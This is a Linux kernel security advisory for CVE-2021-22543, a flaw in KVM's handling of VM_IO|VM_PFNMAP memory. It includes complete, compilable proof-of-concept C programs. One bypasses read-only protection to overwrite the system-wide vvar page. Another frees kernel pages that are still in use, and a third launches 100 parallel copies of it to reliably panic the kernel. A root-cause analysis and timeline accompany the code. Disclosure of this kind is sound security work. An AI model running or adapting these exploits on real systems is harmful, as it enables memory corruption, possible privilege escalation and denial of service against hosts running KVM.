Linux: KVM VM_IO|VM_PFNMAP vma mishandling

   Moderate
   sirdarckcat published GHSA-7wq5-phmq-m584 on May 18, 2021

Package

   Linux Kernel

Affected versions

   add6a0cd1c5ba51b201e1361b05a5df817083618

Patched versions

   n/a

Description

  Summary

   Improper handling of VM_IO|VM_PFNMAP vmas in KVM can bypass read-only (RO)
   checks and lead to pages being freed while still accessible by the VMM and
   guest.

  Severity

   Moderate - On some systems, allows users with the ability to start and
   control a VM to read/write random pages of memory.

  Proof of Concept

   vvar_write.c
   Compile the code below using gcc -o vvar_write vvar_write.c. Running the
   code once will show that the vvar page is modified; running it a second
   time will show that the modification affects other processes (see the
   companion reader sketch after the listing).

 /* @author Jann Horn
  * at https://elixir.bootlin.com/linux/v5.10.11/source/arch/x86/entry/vdso/vma.c#L297 we map the
  * VVAR page of the VDSO, which contains a struct vdso_data
  * (https://elixir.bootlin.com/linux/v5.10.11/source/include/vdso/datapage.h#L90) that contains
  * information about clock offsets and such (to allow ring 3 to figure out the current time using
  * RDTSC without switching to kernel mode). this page is shared across the entire system so that if
  * the clock offset changes, it only has to be changed in one central location. the VVAR page is
  * marked VM_IO so that the get_user_pages machinery keeps its paws off that page. but KVM's
  * hva_to_pfn() is AFAICS going to first try get_user_pages, that will fail, then it notices that
  * the VMA is VM_IO, goes down the hva_to_pfn_remapped path, and then I think that thing just grabs
  * the PFN with follow_pfn and forces the writable flag to true even though the PFN is read-only...
 */
 #define _GNU_SOURCE
 #include <stdio.h>
 #include <string.h>
 #include <err.h>
 #include <errno.h>
 #include <fcntl.h>
 #include <stdlib.h>
 #include <unistd.h>
 #include <sys/ioctl.h>
 #include <sys/mman.h>
 #include <linux/kvm.h>

 /* for real mode */
 static __attribute__((aligned(4096))) char guest_code[0x1000] = {
   0x89, 0x35, /* mov [di],si */
   0xcc, /* int3 */
 };

 static void create_region(int vm, int slot, unsigned long guest_phys, unsigned long host_addr, unsigned long size) {
   struct kvm_userspace_memory_region region = {
     .slot = slot,
     .guest_phys_addr = guest_phys,
     .memory_size = size,
     .userspace_addr = host_addr
   };
   if (ioctl(vm, KVM_SET_USER_MEMORY_REGION, &region))
     err(1, "set region %d", slot);
 }

 int main(void) {
   FILE *mapsfile = fopen("/proc/self/maps", "r");
   if (mapsfile == NULL)
     err(1, "open maps");
   unsigned long vvar_addr;
   while (1) {
     char buf[4096];
     errno = 0;
     if (fgets(buf, sizeof(buf), mapsfile) == NULL)
       err(1, "fgets maps EOF or error");
     if (strstr(buf, "[vvar]") == NULL)
       continue;
     vvar_addr = strtoul(buf, NULL, 16);
     break;
   }
   printf("vvar is at 0x%lx\n", vvar_addr);
   printf("testing read of first vvar page at offset 0xf00: 0x%lx\n", *(unsigned long *)(vvar_addr + 0xf00));

   int kvm = open("/dev/kvm", O_RDWR);
   if (kvm == -1)
     err(1, "open kvm");
   int mmap_size = ioctl(kvm, KVM_GET_VCPU_MMAP_SIZE, 0);
   if (mmap_size == -1)
     err(1, "KVM_GET_VCPU_MMAP_SIZE");

   int vm = ioctl(kvm, KVM_CREATE_VM, 0);
   if (vm == -1)
     err(1, "create vm");
   if (ioctl(vm, KVM_SET_TSS_ADDR, 0x10000000UL))
     err(1, "KVM_SET_TSS_ADDR");
   create_region(vm, 0, 0x0, (unsigned long)guest_code, 0x1000);
   create_region(vm, 1, 0x1000, vvar_addr, 0x1000);

   int vcpu = ioctl(vm, KVM_CREATE_VCPU, 0);
   if (vcpu == -1)
     err(1, "create vcpu");
   struct kvm_run *vcpu_state = mmap(NULL, mmap_size, PROT_READ|PROT_WRITE, MAP_SHARED, vcpu, 0);
   if (vcpu_state == MAP_FAILED)
     err(1, "mmap vcpu");

   struct kvm_sregs sregs;
   if (ioctl(vcpu, KVM_GET_SREGS, &sregs))
     err(1, "KVM_GET_SREGS");
   sregs.cs.selector = 0;
   sregs.cs.base = 0;
  struct kvm_regs regs = {
    .rdi = 0x1f00, /* guest-physical 0x1f00 = offset 0xf00 into the vvar slot */
    .rsi = 0xf00d, /* marker value the guest stores there */
    .rip = 0x0,    /* execution starts at the guest_code stub */
    .rflags = 2    /* bit 1 of RFLAGS is reserved and must be set */
  };
   if (ioctl(vcpu, KVM_SET_SREGS, &sregs))
     err(1, "set sregs");
   if (ioctl(vcpu, KVM_SET_REGS, &regs))
     err(1, "set regs");

   if (ioctl(vcpu, KVM_RUN, 0))
     err(1, "run vcpu");
   printf("exit_reason = %d\n", vcpu_state->exit_reason);
   if (vcpu_state->exit_reason == KVM_EXIT_FAIL_ENTRY) {
     printf("KVM_EXIT_FAIL_ENTRY happened: hardware_entry_failure_reason = 0x%lx\n",
            (unsigned long)vcpu_state->fail_entry.hardware_entry_failure_reason);
   }

   printf("testing read of first vvar page at offset 0xf00: 0x%lx\n", *(unsigned long *)(vvar_addr + 0xf00));
 }
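
   As a quick cross-check of the second-run behavior, the companion reader
   below (a sketch: vvar_read.c is a hypothetical name, and it reuses the
   /proc/self/maps parsing and the 0xf00 offset from vvar_write.c) prints
   the qword that vvar_write overwrites. Run after vvar_write, it should
   print 0xf00d from a process that never touched /dev/kvm:

 /* vvar_read.c - hypothetical companion reader; build with
  * gcc -o vvar_read vvar_read.c */
 #include <stdio.h>
 #include <string.h>
 #include <stdlib.h>
 #include <err.h>

 int main(void) {
   FILE *mapsfile = fopen("/proc/self/maps", "r");
   if (mapsfile == NULL)
     err(1, "open maps");
   char buf[4096];
   unsigned long vvar_addr = 0;
   /* find this process's own [vvar] mapping, as vvar_write.c does */
   while (fgets(buf, sizeof(buf), mapsfile) != NULL) {
     if (strstr(buf, "[vvar]")) {
       vvar_addr = strtoul(buf, NULL, 16);
       break;
     }
   }
   if (vvar_addr == 0)
     errx(1, "no [vvar] mapping found");
   /* 0xf00d here means the system-wide vvar page is still corrupted */
   printf("vvar[0xf00] = 0x%lx\n", *(unsigned long *)(vvar_addr + 0xf00));
   return 0;
 }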

   kernel_write.c
   Compile the code below using gcc -o kernel_write kernel_write.c. What
   exactly happens when running the code depends on what the improperly
   freed page is reallocated for. Running 100 instances in parallel (see
   the launcher sketch after the listing) should reliably cause a kernel
   panic within a few seconds.

 /* @author Jann Horn */
 #define _GNU_SOURCE
 #include <stdio.h>
 #include <string.h>
 #include <err.h>
 #include <errno.h>
 #include <fcntl.h>
 #include <stdlib.h>
 #include <unistd.h>
 #include <sys/ioctl.h>
 #include <sys/mman.h>
 #include <linux/kvm.h>

 /* for real mode */
 static __attribute__((aligned(4096))) char guest_code[0x1000] = {
   0x89, 0x35, /* mov [di],si */
   0xcc, /* int3 */
 };

 static void create_region(int vm, int slot, unsigned long guest_phys, unsigned long host_addr, unsigned long size) {
   struct kvm_userspace_memory_region region = {
     .slot = slot,
     .guest_phys_addr = guest_phys,
     .memory_size = size,
     .userspace_addr = host_addr
   };
   if (ioctl(vm, KVM_SET_USER_MEMORY_REGION, &region))
     err(1, "set region %d size=0x%lx", slot, size);
 }

 int main(void) {
   sync(); /* in case we're about to panic the kernel... */

   char *usb_path = "/dev/bus/usb/001/001";
   int usb_fd = open(usb_path, O_RDONLY);
   if (usb_fd == -1)
     err(1, "open '%s'", usb_path);
   char *usb_mapping = mmap(NULL, 0x2000, PROT_READ, MAP_SHARED, usb_fd, 0);
   if (usb_mapping == MAP_FAILED)
     err(1, "mmap 2 pages from usb device");

   int kvm = open("/dev/kvm", O_RDWR);
   if (kvm == -1)
     err(1, "open kvm");
   int mmap_size = ioctl(kvm, KVM_GET_VCPU_MMAP_SIZE, 0);
   if (mmap_size == -1)
     err(1, "KVM_GET_VCPU_MMAP_SIZE");

   int vm = ioctl(kvm, KVM_CREATE_VM, 0);
   if (vm == -1)
     err(1, "create vm");
   if (ioctl(vm, KVM_SET_TSS_ADDR, 0x10000000UL))
     err(1, "KVM_SET_TSS_ADDR");
   create_region(vm, 0, 0x0, (unsigned long)guest_code, 0x1000);

   int vcpu = ioctl(vm, KVM_CREATE_VCPU, 0);
   if (vcpu == -1)
     err(1, "create vcpu");
   struct kvm_run *vcpu_state = mmap(NULL, mmap_size, PROT_READ|PROT_WRITE, MAP_SHARED, vcpu, 0);
   if (vcpu_state == MAP_FAILED)
     err(1, "mmap vcpu");

   while (1) {
     create_region(vm, 1, 0x1000, (unsigned long)usb_mapping+0x1000, 0x1000);
     struct kvm_sregs sregs;
     if (ioctl(vcpu, KVM_GET_SREGS, &sregs))
       err(1, "KVM_GET_SREGS");
     sregs.cs.selector = 0;
     sregs.cs.base = 0;
    struct kvm_regs regs = {
      .rdi = 0x1f00, /* guest-physical 0x1f00 = offset 0xf00 into the usbfs page in slot 1 */
      .rsi = 0xf00d, /* marker value the guest stores there */
      .rip = 0x0,
      .rflags = 2    /* bit 1 of RFLAGS is reserved and must be set */
    };
     if (ioctl(vcpu, KVM_SET_SREGS, &sregs))
       err(1, "set sregs");
     if (ioctl(vcpu, KVM_SET_REGS, &regs))
       err(1, "set regs");

     if (ioctl(vcpu, KVM_RUN, 0))
       err(1, "run vcpu");
     printf("exit_reason = %d\n", vcpu_state->exit_reason);
     if (vcpu_state->exit_reason == KVM_EXIT_FAIL_ENTRY) {
       printf("KVM_EXIT_FAIL_ENTRY happened: hardware_entry_failure_reason = 0x%lx\n",
              (unsigned long)vcpu_state->fail_entry.hardware_entry_failure_reason);
     }
     create_region(vm, 1, 0, 0, 0);
   }
 }
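
   The launcher below (a sketch: run_many.c is a hypothetical name, and it
   assumes kernel_write was built in the current directory) spawns the 100
   parallel instances:

 /* run_many.c - hypothetical launcher; build with gcc -o run_many run_many.c.
  * On affected kernels, expect a panic within a few seconds. */
 #include <unistd.h>
 #include <sys/wait.h>
 #include <err.h>

 int main(void) {
   for (int i = 0; i < 100; i++) {
     pid_t pid = fork();
     if (pid == -1)
       err(1, "fork");
     if (pid == 0) {
       execl("./kernel_write", "kernel_write", (char *)NULL);
       err(1, "execl kernel_write"); /* reached only if exec fails */
     }
   }
   while (wait(NULL) > 0)
     ; /* normally unreached: the machine should panic first */
   return 0;
 }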

  Further Analysis

   The issue lies in how KVM maps certain types of host memory into the
   guest. Most of the time, KVM uses get_user_pages to translate a host
   virtual address into the page it needs to map into the guest. However,
   get_user_pages fails if the address lies in a vma with the VM_IO or
   VM_PFNMAP flag set (checked in check_vma_flags [1]). KVM handles that
   failure by using follow_pfn to fetch the pfn directly from the vma's
   page tables [2]. If the backing page does not have the PG_reserved bit
   set, KVM proceeds to treat it as a normal page [3] and calls
   get_page/put_page on it. However, reference counting on such pages might
   not be set up to handle this - for example, on the tail pages of the
   higher-order pages allocated in ttm_pool_alloc_page [4]. Such pages can
   end up being freed by the put_page call at the end of the guest page
   fault, even though the guest and host still reference them.

   [1]
   https://github.com/torvalds/linux/blob/d635a69dd4981cc51f90293f5f64268620ed1565/mm/gup.c#L886
   [2]
   https://github.com/torvalds/linux/blob/d635a69dd4981cc51f90293f5f64268620ed1565/virt/kvm/kvm_main.c#L1981
   [3]
   https://github.com/torvalds/linux/blob/d635a69dd4981cc51f90293f5f64268620ed1565/virt/kvm/kvm_main.c#L174
   [4]
   https://github.com/torvalds/linux/blob/f78d76e72a4671ea52d12752d92077788b4f5d50/drivers/gpu/drm/ttm/ttm_pool.c#L83
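
   In rough pseudocode, the path described above looks like this (a
   condensed paraphrase for illustration only, not the literal kernel
   source; see [1]-[4] for the real code, with function and flag names as
   in v5.10-era kernels):

 /* Condensed sketch of the buggy flow; kernel context assumed, not
  * compilable standalone. */
 kvm_pfn_t hva_to_pfn(unsigned long addr, bool write_fault, bool *writable)
 {
   struct vm_area_struct *vma;
   struct page *page;
   unsigned long pfn;

   /* Normal path: pin the backing page with get_user_pages. For vmas with
    * VM_IO or VM_PFNMAP set, check_vma_flags rejects the request [1]. */
   if (get_user_pages(addr, 1, write_fault ? FOLL_WRITE : 0, &page, NULL) == 1)
     return page_to_pfn(page);

   /* Fallback for VM_IO/VM_PFNMAP vmas [2]: read the pfn straight out of
    * the page tables without taking a reference... */
   vma = find_vma(current->mm, addr);
   if (vma && (vma->vm_flags & (VM_IO | VM_PFNMAP))) {
     follow_pfn(vma, addr, &pfn);
     /* ...and report the mapping as writable even when the PTE is
      * read-only: the RO bypass. */
     if (writable)
       *writable = true;
     /* Because the pfn's struct page lacks PG_reserved, KVM later treats
      * it as a normal pinned page [3] and calls get_page/put_page on it;
      * for pages whose refcount was never set up for that (e.g. tail pages
      * of the higher-order ttm_pool_alloc_page allocations [4]), the final
      * put_page frees the page while guest and host still map it. */
     return pfn;
   }
   return KVM_PFN_ERR_FAULT;
 }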

  Timeline

   Date reported: 2021-02-01 (reported to kernel.org)
   Date fixed: the RO bypass was fixed on 2021-02-04; the improper freeing
   of pages has not yet been fixed
   Date disclosed: 2021-05-18

CVE ID

   CVE-2021-22543

Credits

   * @dgstevens
   * @thejh (Jann Horn)
   * @fluxchief (Kevin Hamacher)